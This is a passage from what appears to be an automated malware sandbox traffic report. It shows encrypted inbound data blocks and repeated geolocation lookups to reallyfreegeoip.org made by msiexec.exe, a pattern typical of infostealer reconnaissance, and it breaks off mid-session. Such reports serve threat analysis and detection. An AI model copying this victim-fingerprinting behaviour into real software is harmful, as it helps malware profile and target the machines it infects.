2024-10-21 09:57:03 UTC	1378	IN	Data Raw: d8 8a b6 55 d5 9d b9 92 f1 39 47 db 34 55 2e 04 ec ba 44 82 e5 45 3a 28 99 dd e3 30 30 ae 04 1b 5b 99 c7 65 df 7e f6 93 ce 1c c5 b1 d0 b3 40 78 09 e0 8d 31 16 ed fb 32 2b 1b b0 29 7b b0 0e ec c1 62 2c 98 13 72 e2 b5 75 ee 60 96 3b dd 0a f7 be f2 a2 46 91 e9 31 b6 f9 96 a2 20 e3 d3 e7 9e ad 01 cb 88 72 06 4f 59 9e 2f bd 82 6f a9 db a1 28 4a 6a 3b 78 bf 77 fc 2f 59 e6 3f 9a 1e 37 96 4f 9b ba b9 83 a5 e0 9a 73 ef d7 e2 6b ae 06 ff e4 f3 b0 3f 45 c9 61 a9 35 db 1f 71 85 f3 2c 42 e8 21 b6 b4 7b 9d 8d b2 1a 5e 4c 6a b0 ac af 49 05 6b c6 5e a5 b2 7a 92 a8 12 72 5f 3c 22 49 e0 e4 54 60 bf 4e 6c 6e 89 db 12 38 38 04 54 ea 50 d9 c9 6f ae 90 eb 88 12 2e bc 1d 22 0f 73 35 95 74 c3 e9 af b3 81 42 fb 2d 4a 49 f7 ba 70 b7 bf d2 d2 3c ed d2 cb 21 ef 3c af b7 81 86 5b 86 Data Ascii: U9G4U.DE:(00[e~@x12+){b,ru`;F1 rOY/o(Jj;xw/Y?7Osk?Ea5q,B!{^LjIk^zr_<"IT`Nln88TPo."s5tB-JIp<!<[
2024-10-21 09:57:03 UTC	1378	IN	Data Raw: c1 f1 f4 b3 8f 3b 30 bd f0 57 5c 8d 84 d8 92 6f 98 84 37 e5 69 7f ed 10 e3 5e 84 68 34 b1 57 bf c6 94 f6 80 24 bb df 9f 4d d2 20 45 a7 dd 62 e1 86 90 1a 09 45 ba 46 a1 f5 f4 75 92 7c be 83 76 4e c2 88 1b de 9c 88 85 0b c6 d1 dd fd d8 77 d0 f8 fe aa 20 7f d9 78 09 07 47 cc d5 be 01 fa 8a 83 46 b5 60 30 76 2c 56 a5 00 26 fa be ab 41 78 1a 44 f2 bd b0 32 2a 88 6a 65 75 38 48 fa 4e 77 42 09 54 42 ef 62 80 32 b6 dc f8 c5 76 47 2e b5 79 9e b0 3c a6 a1 cb c5 8d 2b 90 57 2e a7 3f 2c fd b2 c9 34 66 b7 ca a3 6d 4c c9 a0 b8 38 29 2e 61 b3 13 3b 77 40 e0 af be 2e 32 3c db c1 4f ff 6c ea 6d 7f 2d 05 7e 9e 7d 7f 8a dc 2b 43 29 3c d6 c1 06 59 af 2b 98 06 5e 91 de e6 2b df c7 ba a2 70 fe 07 d1 5a 8a 8a de 0b c7 a1 fe e1 66 9c 13 3f 89 27 20 00 d7 9d 09 fd e0 01 21 79 01 Data Ascii: ;0W\o7i^h4W$M EbEFu\|vNw xGF`0v,V&AxD2*jeu8HNwBTBb2vG.y<+W.?,4fmL8).a;w@.2<Olm-~}+C)<Y+^+pZf?' !y
2024-10-21 09:57:03 UTC	1378	IN	Data Raw: 53 f7 2d 85 89 ae 2d 4e c7 3f e0 c5 38 7f d9 7c e1 49 75 07 85 12 0c fc da 2d 9c 3a 41 6e 3b e9 a7 d7 23 3d 57 7e be 46 a5 87 12 cf 31 9c 77 b7 31 45 0d c1 e6 d4 d7 c6 f6 e9 fe 38 98 e4 a3 11 9e fd 31 9a 3a bc e1 6d 7b dd 8d a2 94 2e 20 67 44 ff 18 d4 db c7 a7 0c 11 cc c9 ab 16 89 d9 70 d2 8a 60 20 6c 74 84 d5 9b 9b 97 f0 2f df b9 2b bb 96 53 a1 d0 5d aa 05 ea a2 ff db 8f f0 c1 b7 ad c8 b3 99 18 2a 01 c1 5b 54 d8 25 13 2f 72 2a e2 32 f0 78 ce 5a c9 49 f6 1f a3 c5 53 55 3b ca f8 83 d6 e2 cc 48 17 ea 96 fb 90 20 53 14 08 24 4e d0 b5 35 62 2d de f6 72 de 3e 62 70 43 86 0d d3 19 85 cd 9a e1 47 25 ba 99 3f 01 98 a0 69 41 80 60 60 55 48 25 1a e9 d2 56 d8 05 5e ac 40 3b 46 30 db 0e 29 c9 98 1c fe 98 85 00 d7 22 4b 58 f1 7c d2 39 b6 92 46 48 99 b7 0b 8e 74 44 eb Data Ascii: S--N?8\|Iu-:An;#=W~F1w1E81:m{. gDp` lt/+S][T%/r2xZISU;H S$N5b-r>bpCG%?iA``UH%V^@;F0)"KX\|9FHtD
2024-10-21 09:57:03 UTC	1378	IN	Data Raw: 37 4c e1 6e 52 66 00 7b 6b 72 b5 f0 4f bf a8 a2 a4 e2 e2 09 bf 31 a5 3c 48 ee 20 97 1c 6d ec ae b5 15 02 f4 22 6b 3c 8b 65 6d 88 71 f1 f2 80 57 f8 92 ea 7f 5b 61 85 27 e7 c7 93 74 b0 b0 aa a4 09 30 f5 a7 e8 02 bc 34 fb f2 7e b1 91 5d f2 97 93 a4 94 ec f4 4f 17 61 95 d8 14 c1 b0 df 19 2b 66 80 7d db 76 20 fa c6 9a ff a1 99 00 5a 8a f9 c4 10 0f e1 5f fb 20 6a 71 57 80 62 b8 59 b2 b3 af c1 3c ae 0a 33 a1 46 20 23 65 eb de e1 20 47 fb dc fe b5 64 5f fe 7d 78 e3 23 65 e4 29 fe a3 ac a9 86 0a 1e 9a 3b cc 7f 8d 13 09 60 75 8c a9 78 f3 1d d2 3a b2 83 47 c3 7f d6 c5 41 cd 4d ad 61 e0 01 25 5d 81 db 01 be d6 16 14 6e 86 02 87 96 e5 b9 08 a7 ad a7 2e ae 2b ed b8 91 a2 53 1c 57 ba 89 5a 06 16 4e 9f 55 22 cf 45 3a 2c 3b 86 cb 42 80 a5 76 3c fb b1 c2 73 f7 f5 99 cf c4 Data Ascii: 7LnRf{krO1<H m"k<emqW[a't04~]Oa+f}v Z_ jqWbY<3F #e Gd_}x#e);`ux:GAMa%]n.+SWZNU"E:,;Bv<s
2024-10-21 09:57:03 UTC	1378	IN	Data Raw: a9 3f fe b6 e0 08 ed e2 f4 54 b5 f9 ec 00 01 f9 79 e7 94 b4 23 03 ac 04 0f 63 54 97 60 bc 8e 6f a3 f3 0a f6 59 45 13 4c c1 48 f6 3c 59 f7 36 8a 0c 24 9c e2 86 a3 b9 83 a1 c8 d3 0d dd dd f3 4d a2 11 fd e4 87 8e 29 c4 c9 67 a3 fd 35 3b 4a b4 e2 29 71 31 00 b6 9c 67 b2 8d b8 c0 2c 7d 68 b0 a2 8e 61 84 6f b4 03 b1 4c 0b 97 86 82 74 66 06 35 b7 e1 f7 64 8f 9d 5f 30 73 02 e8 d2 38 39 2b 6a 59 34 d6 c3 1f 7f 77 fc a0 ac 3d bb 06 87 54 51 47 eb 7f b0 5a 0d 96 92 53 07 2d 4a 47 55 8e 6d aa d8 dd d2 46 31 ca d0 5f c1 53 69 b3 23 a9 47 e5 74 1b 75 b6 ca 3f bd fd f4 61 9b 68 6d 6b 12 a7 67 ca 14 38 f4 3e 95 38 46 ad 49 0f c7 94 ed f5 3e 05 59 86 b8 4b d8 a5 85 4b ec b3 e7 7f ec fe 69 d2 30 40 93 f1 58 ec 06 de 4f 35 f0 31 bb 07 e7 b5 f5 90 dc 98 f1 83 24 cf 0e 73 56 Data Ascii: ?Ty#cT`oYELH<Y6$M)g5;J)q1g,}haoLtf5d_0s89+jY4w=TQGZS-JGUmF1_Si#Gtu?ahmkg8>8FI>YKKi0@XO51$sV
2024-10-21 09:57:03 UTC	1378	IN	Data Raw: c4 05 fc c5 f5 da 93 52 d8 3f 77 07 47 cc 77 9b 08 80 8a b2 46 c5 c6 3d a4 52 6e af 6f ee 58 9b bb 33 52 11 3a b8 1f 95 2d 2a 93 6a 65 75 e9 d1 e6 3c 45 3b c4 24 e0 cd 17 91 3a ad b5 cb 0b 76 4d 37 97 73 15 9f f3 a6 a0 e4 d3 d7 05 87 57 58 05 c4 2b f0 2e fd 34 6c 1f fc b1 1f 1a a4 a0 c8 90 d2 37 1f 8b 13 45 46 e2 c5 b1 be 42 33 3c db 75 4f 0b 6c ea 6d 7a f0 12 45 e3 6c 74 b9 17 0a 43 25 42 fd e9 71 5d 87 ca 98 06 2a bd d2 98 19 ce e5 cc ba 45 ef 77 df 53 a2 0b da 23 84 b7 00 ea 64 b2 7c 72 b0 fe 24 28 e9 8b 21 8d e0 df 3b 5c 09 83 27 e1 ca b7 7b fc 7a fd fb 93 6d 4c a5 e5 26 55 28 80 85 e1 70 ee a2 cd 1c 22 f2 bf ae 59 bd c7 f5 6a 53 44 bd d2 a0 a5 f8 42 99 86 3f 90 d2 35 e8 ab 50 fd 5f fb a6 aa 03 1d ea dd 2d 96 e6 57 76 49 93 da 80 51 9f 02 71 e8 ff a5 Data Ascii: R?wGwF=RnoX3R:-jeu<E;$:vM7sWX+.4l7EFB3<uOlmzEltC%Bq]EwS#d\|r$(!;\'{zmL&U(p"YjSDB?5P_-WvIQq
2024-10-21 09:57:03 UTC	1378	IN	Data Raw: 50 6e 15 48 ea 30 a0 a8 15 a1 63 a2 a3 1a a1 64 9b cc 0e 9e a2 3b 24 1f b7 fa 9e 91 88 82 a6 54 df b9 25 b7 de 51 a1 a4 63 c8 84 ea a8 57 d9 65 e5 fa 1f bc da 95 e1 8a 3b 16 af 9d 54 d0 5d 93 3f 59 51 8d 98 e1 6e ab 90 c1 37 be 1f a3 d0 3c 68 05 ca fc f4 42 29 cc 42 72 38 5a fb 9a 2a 7b 5f 19 5a 7e cd 38 71 1c 16 df d3 60 df 8e 77 70 39 4b e5 c4 31 3b cd 8b fa f4 0c cd 25 41 0e 92 d0 da 68 f6 d1 58 55 42 21 66 dc ed 0c 4e 0a 5e d6 f1 0d 5d 66 a5 0e 29 c7 29 f2 fe 98 8f a2 f2 40 0c 60 e5 78 d0 cc 9c e7 36 5e bb 59 57 8e 7e 58 18 bb f9 43 e1 5a 61 d7 5b 6f 2a e7 b6 de ab 23 8c e2 bd fc 56 a6 6e 9d 6c a6 bf 59 68 f3 7b 8e ae be 09 5a 66 32 5f 8d dd 6b 10 05 43 6b 78 a2 4f 7b b9 b5 32 a7 e2 98 ab 8b 30 b4 b6 48 ee 2e 35 28 6a f1 4d a3 15 78 56 0a 26 ff 8b 6f Data Ascii: PnH0cd;$T%QcWe;T]?YQn7<hB)Br8Z{_Z~8q`wp9K1;%AhXUB!fN^]f))@`x6^YW~XCZa[o#VnlYh{Zf2_kCkxO{20H.5(jMxV&o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	54115	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:06 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:57:06 UTC	904	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30291 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bwQl0o3we76aYPIVz7X9dR%2FthKYEWCpN%2FqfxcBLxZpPXOhcrzMGqwKBIKczmuOEyTvJUXA0bSwm1G6Veq1%2BNcNbINdOPsN4lUF%2FVIc8I7OSe%2BU%2FkNNqerz%2BYVbmBED6NhWnC5x%2Fr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061aad93f6c7f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1239&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2255451&cwnd=248&unsent_bytes=0&cid=6ba9d7221cffacf0&ts=151&x=0"
2024-10-21 09:57:06 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	54121	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:07 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:57:07 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30292 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzSqPFiCgLO8c%2BxMC2Hgozs4d0Fxz6L0%2F9hnWdxTWLmepvNhvnPANZ0gwMc7N5HT%2BJ7O3hVl36cx387GjTfHzQcqoH%2FUCkKq3rI%2FIAoZCvLEQf3hF5lGQI8I%2FQTj1fqpg0teirgQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061b08d6e2cd0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1517&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1739339&cwnd=246&unsent_bytes=0&cid=020de24f23f22f4e&ts=144&x=0"
2024-10-21 09:57:07 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	54131	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:08 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:57:08 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30293 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJ12Jr6z2cG0qzM8K19KP6%2FXjOWrS3lt7cPa2BI0ys4uanWPuNEXg142TGHZWTdebJ%2BYiPAPBnNf%2FKH87b290AOX7T2DOXJMlSFOlyIxq2aZjac%2FDeZPooJh0Pm0F1dcBTl2sxbk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061b94884e779-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2200607&cwnd=248&unsent_bytes=0&cid=d38d807a45653f32&ts=143&x=0"
2024-10-21 09:57:08 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	54140	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:09 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:57:10 UTC	895	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30295 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NO8hUgXUWzQjxf97m0gRmwT8Kg188fKwVJKfxpLdaYLjJyKSYi59EKcrOPhHvtmg0%2B%2BoPXgol6vlqTMWj7%2FPDNLGCMbEBQwv7lcgwUdwWVMaaVTWvYmQ9vKCuUv0PsZMCJZp%2B8z3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061c1edb8e6fe-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1364&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2067094&cwnd=32&unsent_bytes=0&cid=c890881186692bfa&ts=141&x=0"
2024-10-21 09:57:10 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	54151	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:11 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:57:11 UTC	902	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30296 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXsiNEexVWxjB02ezVvL1kqXulYckUu96qV%2B5HZi6Bwahxd18mY5gf%2F8zmV8z%2Bcu09KbzX4f5a%2BOwuQnH5j%2BA9LHc1TFeKNi%2BBGW3JjG8ApWTSIZWAZgYhi95TgC80oAlLx2wWLk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061cac9b96b2d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1136&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2483704&cwnd=249&unsent_bytes=0&cid=e408c56ceedafe7b&ts=150&x=0"
2024-10-21 09:57:11 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	54160	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:13 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:57:13 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30298 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DpNk2YTA6Vt62U3jZpjmCOLyJiOWfmG%2BdNGdbZE24G1SdGrVcrbTCICAHF6oY%2FfpwomZNrqzmfylmLBeIpW56Op6O9dL1h%2F%2BKMvV8RZEYyoc4t5z4LcJcgS2GSnv%2B24ika41eYRp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061d4dbf1878a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1495095&cwnd=235&unsent_bytes=0&cid=a5bfcf116b666a7e&ts=353&x=0"
2024-10-21 09:57:13 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	54170	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:14 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
